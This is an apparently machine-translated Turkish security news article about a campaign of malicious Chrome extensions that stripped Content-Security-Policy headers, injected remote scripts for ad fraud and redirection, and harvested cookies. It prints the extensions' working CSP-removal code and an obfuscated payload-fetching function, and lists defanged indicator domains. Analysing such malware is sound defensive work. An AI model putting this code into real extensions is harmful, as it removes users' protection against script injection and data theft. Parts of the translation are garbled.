Dünya çapında 3,2 milyondan fazla kullanıcıya enfekte olan en az 16 kötü niyetli krom uzantıyı içeren koordineli bir kampanya, reklam sahtekarlığı ve arama motoru optimizasyonu manipülasyonunu yürütmek için tarayıcı güvenlik açıklarından yararlanıyor.
Şubat 2025’te Gitlab Tehdit İstihbaratı tarafından keşfedilen bu uzantılar, ekran yakalama araçlarından reklam engelleyicilerine kadar değişen kullanıcı oturumlarına, kritik güvenlik korumalarını çıkardı ve tarama davranışını manipüle etmek için enjekte edilmiş yükler.
Chrome web mağazasından çıkarılmalarına rağmen, uzantıları manuel olarak kaldırmayanlar için devam eden riskler devam ediyor.
Bununla birlikte, GITLAB’daki güvenlik analistleri, kampanyanın teknik karmaşıklığının içerik güvenliği politikası (CSP) manipülasyonu yoluyla tarayıcı güvenliğini bozmaya odaklandığını tespit etti.
Saldırının Anatomisi: İçerik Güvenliği Politikası Sıyırma
Nimble Capture ve KProxy gibi kötü niyetli uzantılar, servis çalışanlarını, oturum başına ziyaret edilen ilk 2.000 web sitesinden siteler arası komut dosyalarına karşı kritik bir savunma olan CSP başlıklarını soymak için kullandı.
Aşağıdaki kod, tehdit oyuncusunun CSP korumalarını geçersiz kılmak için Chrome’un DeclarativenTRequest API’sını nasıl kullandığını gösteriyor:
async function u(e) {
if (!(i.indexOf(e) > -1)) {
i.push(e);
try {
return s > 1999 && (s = 1), s++, chrome.declarativeNetRequest.updateDynamicRules({
addRules: [{
id: s,
action: {
type: "modifyHeaders",
responseHeaders: [{
header: "content-security-policy",
operation: "set",
value: ""
}]
},
condition: {
urlFilter: e,
resourceTypes: ["main_frame", "sub_frame"]
}
}],
removeRuleIds: [s]
})
} catch
}
}CSP’yi devre dışı bırakarak, saldırganlar komut dosyaları enjekte etmek için izin veren bir ortam yarattılar. Daha sonra yapılandırma sunucularına bağlı uzantılar (api.nimblecapture[.]com) gizlenmiş JavaScript yükleri almak için.
Bu yükler gibi rcx-cd-v3.jskurbanların tarayıcıları ve Bunny CDN ve Digitalocean uygulamalarında barındırılan saldırganların altyapısı arasında çift yönlü iletişim kanalları kurdu.
Benzersiz x-do-app-origin başlık (978bc8ed-09a8-444b-9142-df5a19366612) tüm trafiği tek bir ekspres uygulamaya bağladı.
Tehdit oyuncusu çok aşamalı bir dağıtım zinciri kullandı. CSP’yi devre dışı bıraktıktan sonra, uzantılar dinamik olarak üretilen UUID’ler ve Hashed ana bilgisayar adları içeren kötü amaçlı yapılandırmalar yükledi.
Örneğin, initialSet Çevik yakalama işlevi uzak bir komut dosyası enjekte etti (rcx-cd-v3.js) Web sayfalarına, daha sonra Chrome’un ayrıcalıklı API’lerini (chrome.declarativeNetRequest) sayfa bağlamlarına.
Bu, saldırganların şunları sağladı:-
- Hileli reklamlara öncelik vermek için reklam ekran kurallarını değiştirin.
- Microsoft Clarity gibi Block Analytics hizmetleri.
- Enjekte edilen IFRames kullanarak bağlı kuruluş trafiğini AliExpress ve SurfShark gibi alan adlarına yönlendirin.
async function YOKoc() {
let sKBoc = await vsRead("s");
if (["DE", "FR", "GB"].includes(getGeo()) && getDomain().indexOf("amazon") > -1) {
await Eftnc();
let MZfpc = await ceqnc("/exporter/get-campaign", { /* ... */ });
if (MZfpc) gVWoc(MZfpc.d);
}
}Enjekte edilen komut dosyaları, tarama geçmişlerini ve oturum çerezlerini de hasat ederek, potansiyel olarak kimlik bilgilerini ve hassas verileri ortaya çıkardı.
.webp)
Etkilenen kullanıcılardan yapılan incelemeler, bu komut dosyalarının operasyonlarının beklenmedik yönlendirmelerini ve performans bozulmasını açıkladı.
Bu kampanya, tarayıcı uzantısı ekosistemlerindeki sistemik güvenlik açıklarını vurgulamaktadır. Mevcut uzantıları, kod istismarları değil, geliştirici hesap devralmaları yoluyla tehlikeye atarak, saldırganlar Google’ın güvenlik incelemelerini atladı.
Kuruluşlar uzatma izinlerini denetlemelidir (` access) and monitor for unusual network traffic to domains likebipshotextension[.]comorKproxysersvers[.]Site`. Bireyler için, geniş izinler vermede uyanıklık kritik öneme sahiptir.
Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response and Threat Hunting – Register Here